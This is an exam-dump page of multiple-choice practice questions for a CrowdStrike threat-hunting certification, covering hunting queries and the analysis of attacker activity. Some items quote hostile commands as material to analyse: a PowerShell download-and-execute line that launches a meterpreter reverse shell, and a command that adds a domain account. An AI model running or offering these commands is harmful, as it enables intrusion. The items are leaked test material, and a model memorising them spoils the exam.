Spring Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code = simple70

Pass the CrowdStrike CCFH CCFH-202b Questions and answers with Dumpstech

Exam CCFH-202b Premium Access

View all detail and faqs for the CCFH-202b exam

Practice at least 50% of the questions to maximize your chances of passing.
Viewing page 1 out of 2 pages
Viewing questions 1-10 out of questions
Questions # 1:

You see a large number of command-line processes calling back to an unusual domain that you are reviewing with the Bulk Domain Investigate dashboard. What should your next steps be?

Options:

A.

Place a block rule within your gateway firewall while you perform an investigation of the domain to verify reputation

B.

Review the domain reputation along with the network connection history to identify potentially malicious activity

C.

Utilize the Hosts Investigate dashboard to see what other machines have been communicating with that domain

Questions # 2:

You receive an alert for the following process tree:

w3wp.exe > powershell.exe > cmd.exe > whoami.exe > net1.exe Which of the following describes what has occurred?

Options:

A.

Reconnaissance commands run via a webserver compromise

B.

Webserver troubleshooting user access issues by querying whoami and net1

C.

Email gateway automating routine tasks for networking configuration

D.

Email gateway validating user permissions with whoami and network status with net1

Questions # 3:

Refer to the image.

Question # 3

What aggregate function in the CrowdStrike Query Language (CQL) was used to provide the filtered results?

Options:

A.

eval

B.

groupBy

C.

table

D.

stats

Questions # 4:

Which built-in hunting report helps you find executables from the Recycle Bin?

Options:

A.

Indicator Activity

B.

Command Line and ASEP Activity

C.

Executables running from Recycle Bin

D.

Detection Activity

Questions # 5:

What is the purpose of this query?

#event_simpleName=UserLogon LogonType=10 RemoteAddressIP4=* | !cidr(RemoteAddressIP4, subnet=["224.0.0.0/4", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/32"]) | ipLocation(RemoteAddressIP4) | worldMap(ip=RemoteAddressIP4, magnitude=count(aid))

Options:

A.

Display all locations for local subnets on a map

B.

Display all users who are logging in from private IP ranges on a map

C.

Display geolocation data for all network logins on a map

D.

Display geolocation data for RDP connections on a map

Questions # 6:

A compromised host shows evidence that the net user hacker password!23 /add /domain command was executed. Which MITRE ATT & CK technique does this align with?

Options:

A.

Account Manipulation

B.

Acquire Access

C.

Valid Accounts

D.

Create Account

Questions # 7:

Falcon is generating detections for a malicious file evil.exe with varying filepaths on several hosts as end users attempt to execute the file. Which query can be used to proactively hunt where the file exists prior to the user executing it?

Options:

A.

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2 | ImageFileName=/evil.exe/i | ImageFileName=/([\/\\])(? < FileName > \w*\.?\w*)$/ | stats count by aid, hostname, FileName, ImageFileName, CommandLine

B.

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2 | aid=?aid | ImageFilePath=/C:\users\/ | ImageFileName=evil.exe | table([aid, hostname, FileName, ImageFileName, CommandLine], limit=1000)

C.

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2 | aid=?aid | ImageFilePath=C:\users\*\evil.exe | table([aid, hostname, FileName, ImageFileName, CommandLine], limit=1000)

D.

#event_simpleName=ProcessRollup2 OR #event_simpleName=SyntheticProcessRollup2 | ImageFileName=/evil.exe/i | ImageFileName=/([\/\\])(? < FileName > \w*\.?\w*)$/ | table([aid, hostname, FileName, ImageFileName, CommandLine], limit=1000)

Questions # 8:

You are investigating a process tree where WmiPrvSE launched PowerShell with the following command:

powershell.exe Windowstyle Hidden noprofile noexit -c IEX ((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/.../Invoke-Shellcode.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 172.17.0.21 -Lport 8080 -Force

What is this command doing?

Options:

A.

Using PowerShell to perform a discovery scan of 172.17.0.21 on port 8080

B.

Utilizing PowerShell to force a connection to a reverse shell originating from GitHub

C.

Utilizing PowerShell to download a reverse shell from GitHub and executing it to create a connection

D.

Using WMI to update the PowerShell execution policy on a remote host

Questions # 9:

You are searching for all events related to a specific process. Which fields should be selected in a query?

Options:

A.

TargetProcessId and ContextProcessId

B.

ContextProcessId and timestamp

C.

timestamp and TargetProcessId

Questions # 10:

Falcon Machine Learning has prevented and quarantined a file being written to disk that has VSCode as a parent process. This file was compiled by the system owner. What should the next steps be?

Options:

A.

Detonate the file in a private sandbox, and write a Machine Learning exclusion if the file activity is expected

B.

Search for the file hash in VirusTotal, and write a Sensor Visibility Exclusion

C.

Detonate the file in a private sandbox, and write an exclusion for the Indicator of Attack (IOA) if the file activity is expected

D.

Immediately network contain the host as VSCode is frequently used for malicious tunneling

Viewing page 1 out of 2 pages
Viewing questions 1-10 out of questions